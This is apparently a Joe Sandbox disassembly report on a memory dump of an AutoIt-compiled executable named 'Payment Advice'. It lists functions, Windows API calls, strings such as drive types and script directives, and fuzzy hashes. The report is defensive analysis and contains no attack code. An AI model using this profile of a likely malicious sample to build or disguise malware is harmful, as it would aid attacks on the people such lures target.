Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: ddedcbf44665445cdb1e08ba7187a137d4251d11abf0526884fba339965b5c8e
Instruction ID: c73b1bcb5a5f7845f08ea9f8860e4682f59c06f3fac6751a6c39846395a8713e
Opcode Fuzzy Hash: ddedcbf44665445cdb1e08ba7187a137d4251d11abf0526884fba339965b5c8e
Instruction Fuzzy Hash: 47C04CF144014DDFD751DFC0C9449EFB7BCAB04305F105191A24AF1110D7749B459B72

Function 005A8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 005A818F

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0ce53a3a8d0c92f51ae32a4bd39113dd7a3979ac58a86791976166241ac5749f
Instruction ID: 5a9d0f36115dfb630f6632b7c19ec6b8f87b58bbab46f65b34024e503d86a2eb
Opcode Fuzzy Hash: 0ce53a3a8d0c92f51ae32a4bd39113dd7a3979ac58a86791976166241ac5749f
Instruction Fuzzy Hash: B7A0223008030CFBCF082FC2FC0888A3F2EFB022A0B000020F80C80030CBB3A8208AC2

Function 005893F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14eded6c6cd64738a6bca0558c8d66d9f0789f73ebfe58b4a59ceb2be96e1cd5
Instruction ID: 74b4e512d41d7898ab68d8ca69c009dda4ff95a7c98e55823c169b739fede451
Opcode Fuzzy Hash: 14eded6c6cd64738a6bca0558c8d66d9f0789f73ebfe58b4a59ceb2be96e1cd5
Instruction Fuzzy Hash: 6F125DB0A0060AEBDF04EFA5D995ABEBBF5FF48300F144569E806F7251EB35A911CB50

Function 0058E3E3 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4df8b7504776d06d91c500ab44cf15c063886b3566ec92c94f6903f544dc0e
Instruction ID: d26e8a7fd581c2972fd07ceca81b8321f186be028ede7eb201077e48fc4dc96a
Opcode Fuzzy Hash: 7c4df8b7504776d06d91c500ab44cf15c063886b3566ec92c94f6903f544dc0e
Instruction Fuzzy Hash: 6012BD70A0021A8FDB24EF54D446ABEBFB0FF58314F148469DD8AAB351E335AD81CB91

Function 0058AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 6fa316ad1e460774e19e7a2f32795647514e63dfb6b86c530236e71463ff4284
Instruction ID: d270d38e3319cff04300ca1f69d54e2f53c0d9523d8d1bc16e585ed6e1f38b05
Opcode Fuzzy Hash: 6fa316ad1e460774e19e7a2f32795647514e63dfb6b86c530236e71463ff4284
Instruction Fuzzy Hash: FD0293B0A0010ADBDF04EF64D995AAEBFB9FF84300F108469ED06EB255EB35D915CB91

Function 005A02A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 759c2c8a6fb95635a6809ce9d7463bb22e7d203a44dac868c17af832efc596c1
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: A1C1A3322151930ADF6D463AC47443EBEA57EA2BB531A276DD8B3CB4D5EF20C524D720

Function 005A06D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: cc34edb6828a1e18fdf20357ff2e52afcf464c4cd8543e6e432c4c4f0fae5e93
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 67C1AF322151930AEF6D463AC43453EBEA57AA3BB131A276DD4B3CB4D5EF20D524D720

Function 0059FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 28e26e6e5e8eb4f6d71728b41ff20ca6d3ad1fe8b644d82310707e3b643fccdf
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 3FC1AD322091930ADF6D463AC43443EBFA57AA2BB531A077DD8B2CB5D5EF20C924D720

Function 005DA2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 005DA2FE
DeleteObject.GDI32(00000000), ref: 005DA310
DestroyWindow.USER32 ref: 005DA31E
GetDesktopWindow.USER32 ref: 005DA338
GetWindowRect.USER32(00000000), ref: 005DA33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 005DA480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 005DA490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005DA4D8
GetClientRect.USER32(00000000,?), ref: 005DA4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 005DA51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005DA540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005DA553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005DA55E
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005DA567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005DA576
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005DA57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005DA586
GlobalFree.KERNEL32(00000000), ref: 005DA591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005DA5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0060D9BC,00000000), ref: 005DA5B9
GlobalFree.KERNEL32(00000000), ref: 005DA5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 005DA5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 005DA60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005DA630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005DA81D

Strings

static, xrefs: 005DA518, 005DA66F
DISPLAY, xrefs: 005DA680
AutoIt v3, xrefs: 005DA4D0
, xrefs: 005DA7A3

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 5f08120b51e75a245a8fad19ca044aecb0456ca825b364cb2009a29b8d1b7999
Instruction ID: 68c68b3121e03547ba875a135cac9bbe2fe82ef038597ff4966d5c9c2d04b0d1
Opcode Fuzzy Hash: 5f08120b51e75a245a8fad19ca044aecb0456ca825b364cb2009a29b8d1b7999
Instruction Fuzzy Hash: BE028C75900205AFDB14DFA8CC89EAF7FBAFB49310F048659F915AB2A0DB709D41CB60

Function 005ED285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 005ED2DB
GetSysColorBrush.USER32(0000000F), ref: 005ED30C
GetSysColor.USER32(0000000F), ref: 005ED318
SetBkColor.GDI32(?,000000FF), ref: 005ED332
SelectObject.GDI32(?,00000000), ref: 005ED341
InflateRect.USER32(?,000000FF,000000FF), ref: 005ED36C
GetSysColor.USER32(00000010), ref: 005ED374
CreateSolidBrush.GDI32(00000000), ref: 005ED37B
FrameRect.USER32(?,?,00000000), ref: 005ED38A
DeleteObject.GDI32(00000000), ref: 005ED391
InflateRect.USER32(?,000000FE,000000FE), ref: 005ED3DC
FillRect.USER32(?,?,00000000), ref: 005ED40E
GetWindowLongW.USER32(?,000000F0), ref: 005ED439

Part of subcall function 005ED575: GetSysColor.USER32(00000012), ref: 005ED5AE
Part of subcall function 005ED575: SetTextColor.GDI32(?,?), ref: 005ED5B2
Part of subcall function 005ED575: GetSysColorBrush.USER32(0000000F), ref: 005ED5C8
Part of subcall function 005ED575: GetSysColor.USER32(0000000F), ref: 005ED5D3
Part of subcall function 005ED575: GetSysColor.USER32(00000011), ref: 005ED5F0
Part of subcall function 005ED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 005ED5FE
Part of subcall function 005ED575: SelectObject.GDI32(?,00000000), ref: 005ED60F
Part of subcall function 005ED575: SetBkColor.GDI32(?,00000000), ref: 005ED618
Part of subcall function 005ED575: SelectObject.GDI32(?,?), ref: 005ED625
Part of subcall function 005ED575: InflateRect.USER32(?,000000FF,000000FF), ref: 005ED644
Part of subcall function 005ED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005ED65B
Part of subcall function 005ED575: GetWindowLongW.USER32(00000000,000000F0), ref: 005ED670
Part of subcall function 005ED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005ED698

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: e199c577fcf728c63d0f73d041ee4a98337c92483d2b6a1338a2a778d21a8055
Instruction ID: c554674d2f8e0be3623464f9d0db83fdaccd004a95799a9fec3eb1816299c0e4
Opcode Fuzzy Hash: e199c577fcf728c63d0f73d041ee4a98337c92483d2b6a1338a2a778d21a8055
Instruction Fuzzy Hash: 77918071448301BFCB119FA4DC08A6B7BBAFB89325F101B19F9A2961E0D771D944CB62

Function 0059B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 0059B98B
DeleteObject.GDI32(00000000), ref: 0059B9CD
DeleteObject.GDI32(00000000), ref: 0059B9D8
DestroyIcon.USER32(00000000), ref: 0059B9E3
DestroyWindow.USER32(00000000), ref: 0059B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 005FD2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 005FD2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 005FD711

Part of subcall function 0059B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0059B759,?,00000000,?,?,?,?,0059B72B,00000000,?), ref: 0059BA58

SendMessageW.USER32 ref: 005FD758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 005FD76F
ImageList_Destroy.COMCTL32(00000000), ref: 005FD785
ImageList_Destroy.COMCTL32(00000000), ref: 005FD790

Strings

0, xrefs: 005FD5A5

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 6b05fc08bea79980d50146487d21aa82f733cd4abb105c693211cfa0f5e1bcf9
Instruction ID: f375e730263cf6685d8238901fa39e163aa9916ab9093b3f441ea98389d89c64
Opcode Fuzzy Hash: 6b05fc08bea79980d50146487d21aa82f733cd4abb105c693211cfa0f5e1bcf9
Instruction Fuzzy Hash: 61127D305042069FEB15DF18D988BBABFF6FF45304F144969EA89CB262C735E845CBA1

Function 005CDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 005CDBD6
GetDriveTypeW.KERNEL32(?,0061DC54,?,\\.\,0061DC00), ref: 005CDCC3
SetErrorMode.KERNEL32(00000000,0061DC54,?,\\.\,0061DC00), ref: 005CDE29

Strings

Network, xrefs: 005CDD01
ATA, xrefs: 005CDDA1
SSA, xrefs: 005CDDAF
SCSI, xrefs: 005CDD93
RAMDisk, xrefs: 005CDCED
RAID, xrefs: 005CDDC4
Unknown, xrefs: 005CDCE3, 005CDD8C
\\.\, xrefs: 005CDC2B
iSCSI, xrefs: 005CDDCB
Fixed, xrefs: 005CDD0B
1394, xrefs: 005CDDA8
Fibre, xrefs: 005CDDB6
SSD, xrefs: 005CDD50
ATAPI, xrefs: 005CDD9A
SATA, xrefs: 005CDDD9
CDROM, xrefs: 005CDCF7
Removable, xrefs: 005CDD15
USB, xrefs: 005CDDBD
MMC, xrefs: 005CDDE7
PhysicalDrive, xrefs: 005CDC67
FileBackedVirtual, xrefs: 005CDDF5
Virtual, xrefs: 005CDDEE
SAS, xrefs: 005CDDD2

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 74603d3f3054024c6aa68d5a668a578c829a056176a0e1121ee8095d7af05a4a
Instruction ID: 5b6a1a162de6a3f8d255657f81c61d85aaf104530e33d52d86c0bd5e2b0648f9
Opcode Fuzzy Hash: 74603d3f3054024c6aa68d5a668a578c829a056176a0e1121ee8095d7af05a4a
Instruction Fuzzy Hash: 7C51BF34648302AFC200EF94C886E29FFB2FBA4301F11587DF447EB291DA60D945D7A2

Function 0058CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0058CC68
__wcsnicmp.LIBCMT ref: 0058CC80
__wcsnicmp.LIBCMT ref: 0058CC98
__wcsnicmp.LIBCMT ref: 0058CCB0
__wcsnicmp.LIBCMT ref: 0058CCC8
__wcsnicmp.LIBCMT ref: 0058CCE0
__wcsnicmp.LIBCMT ref: 0058CCF8
__wcsnicmp.LIBCMT ref: 0058CD0C
__wcsnicmp.LIBCMT ref: 0058CD4D
__wcsnicmp.LIBCMT ref: 0058CD61
__wcsnicmp.LIBCMT ref: 0058CD75
__wcsnicmp.LIBCMT ref: 0058CD89

Strings

#include, xrefs: 0058CCDA
Cannot parse #include, xrefs: 005F2FA1
#comments-end, xrefs: 0058CD6F
#requireadmin, xrefs: 0058CC92
#notrayicon, xrefs: 0058CC7A
#ce, xrefs: 0058CD83
#OnAutoItStartRegister, xrefs: 0058CCAA
#comments-start, xrefs: 0058CCF2, 0058CD47
#include-once, xrefs: 0058CCC2
#pragma compile, xrefs: 0058CC62
#cs, xrefs: 0058CD06, 0058CD5B
Bad directive syntax error, xrefs: 005F2ECB
Unterminated group of comments, xrefs: 005F2FB4

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 7f8005cdb34d8ce7e709380e369272b77fe0e94a9c78621b9f26abef9fd1c490
Instruction ID: b8591da51dc01debdf6ded659c37da3cb0a8d75432b2ff4d6e74d766275d23e5
Opcode Fuzzy Hash: 7f8005cdb34d8ce7e709380e369272b77fe0e94a9c78621b9f26abef9fd1c490
Instruction Fuzzy Hash: 6D81F27064020BABCB20BA64DD97FBE3F69BF65310F044029FE05BA182EB74D941C7A5

Function 005E638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0061DC00), ref: 005E6449

Strings

UNCHECK, xrefs: 005E66A1
CURRENTTAB, xrefs: 005E64DD
GETSELECTED, xrefs: 005E66C1
GETLINECOUNT, xrefs: 005E66E4
SELECTSTRING, xrefs: 005E6626
DELSTRING, xrefs: 005E6569
CHECK, xrefs: 005E668B
GETCURRENTSELECTION, xrefs: 005E6603
SHOWDROPDOWN, xrefs: 005E6500
TABLEFT, xrefs: 005E64A7
FINDSTRING, xrefs: 005E6596
TABRIGHT, xrefs: 005E64BD
GETLINE, xrefs: 005E678B
GETCURRENTCOL, xrefs: 005E6724
SETCURRENTSELECTION, xrefs: 005E65D6
SENDCOMMANDID, xrefs: 005E67CA
EDITPASTE, xrefs: 005E675B
ISVISIBLE, xrefs: 005E6455
ADDSTRING, xrefs: 005E6536
ISCHECKED, xrefs: 005E6659
ISENABLED, xrefs: 005E648C
GETCURRENTLINE, xrefs: 005E6704
HIDEDROPDOWN, xrefs: 005E6520

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 263c79a8fa149aff12cff8a6a4aa730a9fd9c234d6a28623b902dd16218dfb5b
Instruction ID: ea56601ff02827efd2d6d74d0ae06ba75bd634922c32bb9b5c6c3cefe7f41388
Opcode Fuzzy Hash: 263c79a8fa149aff12cff8a6a4aa730a9fd9c234d6a28623b902dd16218dfb5b
Instruction Fuzzy Hash: A4C144302042869BCA08EF11C55596EBFA6BFE53C4F044859F8D557392DF71ED4ACB81

Function 005ED575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 005ED5AE
SetTextColor.GDI32(?,?), ref: 005ED5B2
GetSysColorBrush.USER32(0000000F), ref: 005ED5C8
GetSysColor.USER32(0000000F), ref: 005ED5D3
CreateSolidBrush.GDI32(?), ref: 005ED5D8
GetSysColor.USER32(00000011), ref: 005ED5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 005ED5FE
SelectObject.GDI32(?,00000000), ref: 005ED60F
SetBkColor.GDI32(?,00000000), ref: 005ED618
SelectObject.GDI32(?,?), ref: 005ED625
InflateRect.USER32(?,000000FF,000000FF), ref: 005ED644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005ED65B
GetWindowLongW.USER32(00000000,000000F0), ref: 005ED670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005ED698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 005ED6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 005ED6DD
DrawFocusRect.USER32(?,?), ref: 005ED6E8
GetSysColor.USER32(00000011), ref: 005ED6F6
SetTextColor.GDI32(?,00000000), ref: 005ED6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 005ED712
SelectObject.GDI32(?,005ED2A5), ref: 005ED729
DeleteObject.GDI32(?), ref: 005ED734
SelectObject.GDI32(?,?), ref: 005ED73A
DeleteObject.GDI32(?), ref: 005ED73F
SetTextColor.GDI32(?,?), ref: 005ED745
SetBkColor.GDI32(?,?), ref: 005ED74F

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
